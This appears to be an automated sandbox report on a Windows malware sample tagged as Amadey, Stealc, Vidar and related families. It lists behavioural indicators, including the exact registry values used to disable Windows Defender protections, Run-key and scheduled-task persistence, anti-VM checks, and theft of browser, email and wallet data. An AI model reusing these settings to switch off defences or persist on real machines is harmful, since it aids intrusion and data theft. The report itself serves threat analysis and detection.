Malware Analysis Report

2025-04-03 09:18

Sample ID 250306-cfxzmswks3
Target a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972
SHA256 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972
Tags
amadey gcleaner healer litehttp stealc systembc 092155 trump bot defense_evasion discovery dropper evasion execution loader persistence spyware stealer trojan vidar ir7am
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972

Threat Level: Known bad

The file a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972 was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner healer litehttp stealc systembc 092155 trump bot defense_evasion discovery dropper evasion execution loader persistence spyware stealer trojan vidar ir7am

GCleaner

Detect Vidar Stealer

Vidar

Vidar family

Healer

Modifies Windows Defender Real-time Protection settings

Detects Healer an antivirus disabler dropper

Healer family

Litehttp family

LiteHTTP

Modifies Windows Defender DisableAntiSpyware settings

Modifies Windows Defender TamperProtection settings

SystemBC

Amadey family

Stealc family

Stealc

Modifies Windows Defender notification settings

Systembc family

Gcleaner family

Amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Windows security modification

Loads dropped DLL

Executes dropped EXE

.NET Reactor protector

Reads user/profile data of local email clients

Reads user/profile data of web browsers

Identifies Wine through registry keys

Checks BIOS information in registry

Adds Run key to start application

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Drops file in Windows directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Browser Information Discovery

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Modifies system certificate store

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-06 02:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 02:01

Reported

2025-03-06 02:04

Platform

win7-20240729-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\rbkvgg\bdhx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\rbkvgg\bdhx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\rbkvgg\bdhx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
N/A N/A C:\ProgramData\rbkvgg\bdhx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\ProgramData\rbkvgg\bdhx.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\765aeb8838.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109140101\\765aeb8838.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\151fdd87ae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109150101\\151fdd87ae.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\ac8277ecde.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109160101\\ac8277ecde.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\b7ef68053e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\b7ef68053e.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\dc32b0ba15.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109130101\\dc32b0ba15.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\rbkvgg\bdhx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
